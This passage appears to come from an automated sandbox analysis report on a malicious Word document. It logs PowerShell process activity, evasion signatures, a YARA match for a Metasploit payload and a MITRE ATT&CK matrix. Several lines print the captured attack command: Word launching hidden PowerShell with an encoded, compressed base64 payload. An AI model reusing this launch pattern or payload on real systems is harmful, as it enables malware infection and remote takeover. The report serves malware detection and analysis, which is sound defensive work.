    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1528Thread sleep time: -1844674407370954s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2860Thread sleep time: -1844674407370954s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2860Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2860Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2668Thread sleep time: -120000s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 60000Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 60000Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
    Source: powershell.exe, 00000002.00000002.417841377.0000000000393000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Encrypted powershell cmdline option foundShow sources
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: Base64 decoded $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("H4sIAAAAAAAAAK1XbXOiyhL+HH8FH1KllsagqIl7a6sOKCgq+IJvMSeVGmBQlHcGkJzd/34a1Jzs3ey9W3WvVZTDTHdP99PP9DQKJncKCUyNSK6OqbsVDkLTdahGoXDbc0VCfaX+KBaMyNFINp0NXneYvHqBq70iXQ9wGFJ/FW6mKEA2VbqNUfBqu3pk4SqVv2SCWI8CXL65KdzkU5ETIgO/OoiYMX61Mdm7eggblZ5Zz+u5NjKdly9fulEQYIec32t9TNgwxLZqmTgslalv1HqPA3w3UQ9YI9Rf1O1rrW+5KrIuYmkXaXsIiHX0bG3saiiLoKZ4lklKxT//LJaf7+ovNd6PkBWWikoaEmzXdMsqlqnv5WzDRerhUlEytcANXYPU1qbDNGrL3Hs5d146+14sXyLbeQji+HWQmdWzTqkIwylgw54xLFap52y/55cX6o93b+aRQ0wb10SH4MD1FBzEpobD2gA5uoXn2AC1Ygjpc3bFMjgRYBIFDnX1BfRi94hLt05kWVWw+/y7dl9KMk6u4P6uUumjEkhNSVCuXjjxO3BIOW/O5iCcn7z/QK4y/H4iWLnwvfAJVXVs4R0i+JUAvh+4Wri5ec6HGOIpTd3QzPW+UnSVksAJRNwgzdK5CCJcfvknP+dtr5ph9ZeG6leti845PWc/vlLPK9fUXwo35cKFPdn8qxqZlo6DbP3Xp6GHDdPBvdRBtqldCV/6LGfYsHCOR+0qJoOfpeJlAeu9CzrFDNDnn9V42yTvutzZOVaDvIfgFVCi/KMz5xyWiqIjYRvwO78DTW8NOGb4Kn05Wul19+w943LXQmFYpaYRnHOtSikYWVivUqwTmpclNiJuPiz+464UWcTUUEiu5l7Kn0B62brrOnBiIg2yCzAsFA9rJrIyVKrUwNQxlyrm7upC8VNMusiy4MiBpRhyAjMZFgrJOBPo1X/nR7mmYCLanoVtkM6rkGChHdScy4nK6YZ2WC/+B7ev5+R8KDKsriB9cBoIoFguqVIrMyBQ14rVn4j3v7n3Y4n5wc1ugC+JLOUH8ZlLSXZcckktu1y+vmOZIxcQQE0IXJtDIW43lbyMlYrMY+SLqXSYtYM+HwsDf8Av4InhYXyBH4+Hc4+bjzU+mkwH9NAQZ4+9ZpREYrTgaEagQe7N7/OGGE/cp3pkN+u6J8YyzIUP/iDsiXGPHTR8V2jvzM7Fzll/piZ1dSMKD2pfaA5WoZDJD8SYE/xux4XxvRh33SHoPbY9h0v0JuaHbbwZawlDHjHandLRqqLQ9f4qlccr3pMVRx+r9ZkwlN8aPDnR+mBO63y41Vc+z0zVkQdxisxOaTvDVFG4VDtGb9OudNAG8lgf+Y8t/a2RCnITcDgpqbSftfWTthESbSOP08GT3Ae7frTeNQeSwoBtRT8l+jKcDBfkiZkiu5mmTrMrH
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: Base64 decoded $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("H4sIAAAAAAAAAK1XbXOiyhL+HH8FH1KllsagqIl7a6sOKCgq+IJvMSeVGmBQlHcGkJzd/34a1Jzs3ey9W3WvVZTDTHdP99PP9DQKJncKCUyNSK6OqbsVDkLTdahGoXDbc0VCfaX+KBaMyNFINp0NXneYvHqBq70iXQ9wGFJ/FW6mKEA2VbqNUfBqu3pk4SqVv2SCWI8CXL65KdzkU5ETIgO/OoiYMX61Mdm7eggblZ5Zz+u5NjKdly9fulEQYIec32t9TNgwxLZqmTgslalv1HqPA3w3UQ9YI9Rf1O1rrW+5KrIuYmkXaXsIiHX0bG3saiiLoKZ4lklKxT//LJaf7+ovNd6PkBWWikoaEmzXdMsqlqnv5WzDRerhUlEytcANXYPU1qbDNGrL3Hs5d146+14sXyLbeQji+HWQmdWzTqkIwylgw54xLFap52y/55cX6o93b+aRQ0wb10SH4MD1FBzEpobD2gA5uoXn2AC1Ygjpc3bFMjgRYBIFDnX1BfRi94hLt05kWVWw+/y7dl9KMk6u4P6uUumjEkhNSVCuXjjxO3BIOW/O5iCcn7z/QK4y/H4iWLnwvfAJVXVs4R0i+JUAvh+4Wri5ec6HGOIpTd3QzPW+UnSVksAJRNwgzdK5CCJcfvknP+dtr5ph9ZeG6leti845PWc/vlLPK9fUXwo35cKFPdn8qxqZlo6DbP3Xp6GHDdPBvdRBtqldCV/6LGfYsHCOR+0qJoOfpeJlAeu9CzrFDNDnn9V42yTvutzZOVaDvIfgFVCi/KMz5xyWiqIjYRvwO78DTW8NOGb4Kn05Wul19+w943LXQmFYpaYRnHOtSikYWVivUqwTmpclNiJuPiz+464UWcTUUEiu5l7Kn0B62brrOnBiIg2yCzAsFA9rJrIyVKrUwNQxlyrm7upC8VNMusiy4MiBpRhyAjMZFgrJOBPo1X/nR7mmYCLanoVtkM6rkGChHdScy4nK6YZ2WC/+B7ev5+R8KDKsriB9cBoIoFguqVIrMyBQ14rVn4j3v7n3Y4n5wc1ugC+JLOUH8ZlLSXZcckktu1y+vmOZIxcQQE0IXJtDIW43lbyMlYrMY+SLqXSYtYM+HwsDf8Av4InhYXyBH4+Hc4+bjzU+mkwH9NAQZ4+9ZpREYrTgaEagQe7N7/OGGE/cp3pkN+u6J8YyzIUP/iDsiXGPHTR8V2jvzM7Fzll/piZ1dSMKD2pfaA5WoZDJD8SYE/xux4XxvRh33SHoPbY9h0v0JuaHbbwZawlDHjHandLRqqLQ9f4qlccr3pMVRx+r9ZkwlN8aPDnR+mBO63y41Vc+z0zVkQdxisxOaTvDVFG4VDtGb9OudNAG8lgf+Y8t/a2RCnITcDgpqbSftfWTthESbSOP08GT3Ae7frTeNQeSwoBtRT8l+jKcDBfkiZkiu5mmTrMrHJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAWABiAFgATwBpAHkAaABMACsASABIADgARgBIADEASwBsAGwAcwBhAGcAcQBJAGwANwBhADYAcwBPAEsAQwBnAHEAKwBJAEoAdgBNAFMAZQBWAEcAbQBCAFEAbABIAGMARwBrAEoAegBkAC8AMwA0AGEAMQBKAHoAcwAzAGUAeQA5AFcAMwBXAHYAVgBaAFQARABUAEgAZABQADkAOQBQAFAAOQBEAFEASwBKAG4AYwBLAEMAVQB5AE4AUwBLADYATwBxAGIAcwBWAEQAawBMAFQAZABhAGgARwBvAFgARABiAGMAMABWAEMAZgBhAFgAKwBLAEIAYQBNAHkATgBGAEkATgBwADAATgBYAG4AZQBZAHYASABxAEIAcQA3ADAAaQBYAFEAOQB3AEcARgBKAC8ARgBXADYAbQBLAEUAQQAyAFYAYgBxAE4AVQBmAEIAcQB1ADMAcABrADQAUwBxAFYAdgAyAFMAQwBXAEkAOABDAFgATAA2ADUASwBkAHoAawBVADUARQBUAEkAZwBPAC8ATwBvAGkAWQBNAFgANgAxAE0AZABtADcAZQBnAGcAYgBsAFoANQBaAHoAKwB1ADUATgBqAEsAZABsAHkAOQBmAHUAbABFAFEAWQBJAGUAYwAzADIAdAA5AFQATgBnAHcAeABMAFoAcQBtAFQAZwBzAGwAYQBsAHYAMQBIAHEAUABBADMAdwAzAFUAUQA5AFkASQA5AFIAZgAxAE8AMQByAHIAVwArADUASwByAEkAdQBZAG0AawBYAGEAWABzAEkAaQBIAFgAMABiAEcAMwBzAGEAaQBpAEwAbwBLAFoANABsAGsAbABLAHgAVAAvAC8ATABKAGEAZgA3ACsAbwB2AE4AZAA2AFAAawBCAFcAVwBpAGsAbwBhAEUAbQB6AFgAZABNAHMAcQBsAHEAbgB2ADUAVwB6AEQAUgBlAHIAaABVAGwARQB5AHQAYwBBAE4AWABZAFAAVQAxAHEAYgBEAE4ARwByAEwAMwBIAHMANQBkADEANAA2ACsAMQA0AHMAWAB5AEwAYgBlAFEAagBpACsASABXAFEAbQBkAFcAegBUAHEAawBJAHcAeQBsAGcAdwA1ADQAeABMAEYAYQBwADUAMgB5AC8ANQA1AGMAWAA2AG8AOQAzAGIAKwBhAFIAUQAwAHcAYgAxADAAUwBIADQATQBEADEARgBCAHoARQBwAG8AYgBEADIAZwBBADUAdQBvAFgAbgAyAEEAQwAxAFkAZwBqAHAAYwAzAGIARgBNAGoAZwBSAFkAQgBJAEYARABuAFgAMQBCAGYAUgBpADkANABoAEwAdAAwADUAawBXAFYAVwB3ACsALwB5ADcAZABsADkASwBNAGsANgB1ADQAUAA2AHUAVQB1AG0AagBFAGsAaABOAFMAVgBDAHUAWABqAGoAeABPADMAQgBJAE8AVwAvAE8ANQBpAEMAYwBuADcAegAvAFEASwA0AHkALwBIADQAaQBXAEwAbgB3AHYAZgBBAEoAVgBYAFYAcwA0AFIAMABpACsASgBVAEEAdgBoACsANABXAHIAaQA1AGUAYwA2AEgARwBPAEkAcABUAGQAMwBRAHoAUABXACsAVQBuAFMAVgBrAHMAQQBKAFIATgB3AGcAegBkAEsANQBDAEMASgBjAGYAdgBrAG4AUAArAGQAdAByADUAcABoADkAWgBlAEcANgBsAGUAdABpADgANAA1AFAAVwBjAC8AdgBsAEwAUABLADkAZgBVAFgAdwBvADMANQBjAEsARgBQAGQAbgA4AHEAeABxAFoAbABvADYARABiAFAAMwBYAHAANgBHAEgARABkAFAAQgB2AGQAUgBCAHQAcQBsAGQAQwBWAC8ANgBMAEcAZgBZAHMASABDAE8AUgArADAAcQBKAG8ATwBmAHAAZQBKAGwAQQBlAHUAOQBDAHoAcgBGAEQATgBEAG4AbgA5AFYANAAyAHkAVAB2AHUAdAB6AFoATwBWAGEARAB2AEkAZgBnAEYAVgBDAGkALwBLAE0AegA1AHgAeQBXAGkAcQBJAGoAWQBSAHYAdwBPADcAOABEAFQAVwA4AE4ATwBHAGIANABLAG4AMAA1AFcAdQBsADEAOQArAHcAOQA0ADMATABYAFEAbQBGAFkAcABhAFkAUgBuAEgATwB0AFMAaQBrAFkAVwBWAGkAdgBVAHEAdwBUAG0AcABjAGwATgBpAEoAdQBQAGkAegArADQANgA0AFUAVwBjAFQAVQBVAEUAaQB1ADUAbAA3AEsAbgAwAEIANgAyAGIAcgByAE8AbgBCAGkASQBnADIAeQBDAHoAQQBzAEYAQQA5AHIASgByAEkAeQBWAEsAcgBVAHcATgBRAHgAbAB5AHIAbQA3AHUAcABDADgAVgBOAE0AdQBzAGkAeQA0AE0AaQBCAHAAUgBoAHkAQQBqAE0AWgBGAGcAcgBKAE8AQgBQAG8AMQBYAC8AbgBSADcAbQBtAFkAQwBMAGEAbgBvAFYAdABrAE0ANgByAGsARwBDAGgASABkAFMAYwB5ADQAbgBLADYAWQBaADIAVwBDAC8AKwBCADcAZQB2ADUAKwBSADgASwBEAEsAcwByAGkAQgA5AGMAQgBvAEkAbwBGAGcAdQBxAFYASQByAE0AeQBCAFEAMQA0AHIAVgBuADQAagAz
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAWABiAFgATwBpAHkAaABMACsASABIADgARgBIADEASwBsAGwAcwBhAGcAcQBJAGwANwBhADYAcwBPAEsAQwBnAHEAKwBJAEoAdgBNAFMAZQBWAEcAbQBCAFEAbABIAGMARwBrAEoAegBkAC8AMwA0AGEAMQBKAHoAcwAzAGUAeQA5AFcAMwBXAHYAVgBaAFQARABUAEgAZABQADkAOQBQAFAAOQBEAFEASwBKAG4AYwBLAEMAVQB5AE4AUwBLADYATwBxAGIAcwBWAEQAawBMAFQAZABhAGgARwBvAFgARABiAGMAMABWAEMAZgBhAFgAKwBLAEIAYQBNAHkATgBGAEkATgBwADAATgBYAG4AZQBZAHYASABxAEIAcQA3ADAAaQBYAFEAOQB3AEcARgBKAC8ARgBXADYAbQBLAEUAQQAyAFYAYgBxAE4AVQBmAEIAcQB1ADMAcABrADQAUwBxAFYAdgAyAFMAQwBXAEkAOABDAFgATAA2ADUASwBkAHoAawBVADUARQBUAEkAZwBPAC8ATwBvAGkAWQBNAFgANgAxAE0AZABtADcAZQBnAGcAYgBsAFoANQBaAHoAKwB1ADUATgBqAEsAZABsAHkAOQBmAHUAbABFAFEAWQBJAGUAYwAzADIAdAA5AFQATgBnAHcAeABMAFoAcQBtAFQAZwBzAGwAYQBsAHYAMQBIAHEAUABBADMAdwAzAFUAUQA5AFkASQA5AFIAZgAxAE8AMQByAHIAVwArADUASwByAEkAdQBZAG0AawBYAGEAWABzAEkAaQBIAFgAMABiAEcAMwBzAGEAaQBpAEwAbwBLAFoANABsAGsAbABLAHgAVAAvAC8ATABKAGEAZgA3ACsAbwB2AE4AZAA2AFAAawBCAFcAVwBpAGsAbwBhAEUAbQB6AFgAZABNAHMAcQBsAHEAbgB2ADUAVwB6AEQAUgBlAHIAaABVAGwARQB5AHQAYwBBAE4AWABZAFAAVQAxAHEAYgBEAE4ARwByAEwAMwBIAHMANQBkADEANAA2ACsAMQA0AHMAWAB5AEwAYgBlAFEAagBpACsASABXAFEAbQBkAFcAegBUAHEAawBJAHcAeQBsAGcAdwA1ADQAeABMAEYAYQBwADUAMgB5AC8ANQA1AGMAWAA2AG8AOQAzAGIAKwBhAFIAUQAwAHcAYgAxADAAUwBIADQATQBEADEARgBCAHoARQBwAG8AYgBEADIAZwBBADUAdQBvAFgAbgAyAEEAQwAxAFkAZwBqAHAAYwAzAGIARgBNAGoAZwBSAFkAQgBJAEYARABuAFgAMQBCAGYAUgBpADkANABoAEwAdAAwADUAawBXAFYAVwB3ACsALwB5ADcAZABsADkASwBNAGsANgB1ADQAUAA2AHUAVQB1AG0AagBFAGsAaABOAFMAVgBDAHUAWABqAGoAeABPADMAQgBJAE8AVwAvAE8ANQBpAEMAYwBuADcAegAvAFEASwA0AHkALwBIADQAaQBXAEwAbgB3AHYAZgBBAEoAVgBYAFYAcwA0AFIAMABpACsASgBVAEEAdgBoACsANABXAHIAaQA1AGUAYwA2AEgARwBPAEkAcABUAGQAMwBRAHoAUABXACsAVQBuAFMAVgBrAHMAQQBKAFIATgB3AGcAegBkAEsANQBDAEMASgBjAGYAdgBrAG4AUAArAGQAdAByADUAcABoADkAWgBlAEcANgBsAGUAdABpADgANAA1AFAAVwBjAC8AdgBsAEwAUABLADkAZgBVAFgAdwBvADMANQBjAEsARgBQAGQAbgA4AHEAeABxAFoAbABvADYARABiAFAAMwBYAHAANgBHAEgARABkAFAAQgB2AGQAUgBCAHQAcQBsAGQAQwBWAC8ANgBMAEcAZgBZAHMASABDAE8AUgArADAAcQBKAG8ATwBmAHAAZQBKAGwAQQBlAHUAOQBDAHoAcgBGAEQATgBEAG4AbgA5AFYANAAyAHkAVAB2AHUAdAB6AFoATwBWAGEARAB2AEkAZgBnAEYAVgBDAGkALwBLAE0AegA1AHgAeQBXAGkAcQBJAGoAWQBSAHYAdwBPADcAOABEAFQAVwA4AE4ATwBHAGIANABLAG4AMAA1AFcAdQBsADEAOQArAHcAOQA0ADMATABYAFEAbQBGAFkAcABhAFkAUgBuAEgATwB0AFMAaQBrAFkAVwBWAGkAdgBVAHEAdwBUAG0AcABjAGwATgBpAEoAdQBQAGkAegArADQANgA0AFUAVwBjAFQAVQBVAEUAaQB1ADUAbAA3AEsAbgAwAEIANgAyAGIAcgByAE8AbgBCAGkASQBnADIAeQBDAHoAQQBzAEYAQQA5AHIASgByAEkAeQBWAEsAcgBVAHcATgBRAHgAbAB5AHIAbQA3AHUAcABDADgAVgBOAE0AdQBzAGkAeQA0AE0AaQBCAHAAUgBoAHkAQQBqAE0AWgBGAGcAcgBKAE8AQgBQAG8AMQBYAC8AbgBSADcAbQBtAFkAQwBMAGEAbgBvAFYAdABrAE0ANgByAGsARwBDAGgASABkAFMAYwB5ADQAbgBLADYAWQBaADIAVwBDAC8AKwBCADcAZQB2ADUAKwBSADgASwBEAEsAcwByAGkAQgA5AGMAQgBvAEkAbwBGAGcAdQBxAFYASQByAE0AeQBCAFEAMQA0AHIAVgBuADQAagAzJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -s -NoLogo -NoProfileJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\pspluginwkr.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\pspluginwkr.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\pspluginwkr.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\pspluginwkr.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior

    Remote Access Functionality:

    barindex
    Yara detected MetasploitPayloadShow sources
    Source: Yara matchFile source: 00000002.00000002.421617900.0000000003A93000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000002.00000002.421677056.0000000003ADF000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000002.00000002.420764427.0000000003737000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000002.00000002.421630363.0000000003AA1000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000002.00000002.420980701.000000000389D000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1292, type: MEMORYSTR

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsCommand and Scripting Interpreter111Path InterceptionProcess Injection11Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScripting22Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion21LSASS MemoryProcess Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsExploitation for Client Execution11Logon Script (Windows)Logon Script (Windows)Process Injection11Security Account ManagerVirtualization/Sandbox Evasion21SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsPowerShell3Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting22LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information1Cached Domain CredentialsSystem Information Discovery11VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

    Behavior Graph

    Hide Legend

    Legend:

    • Process
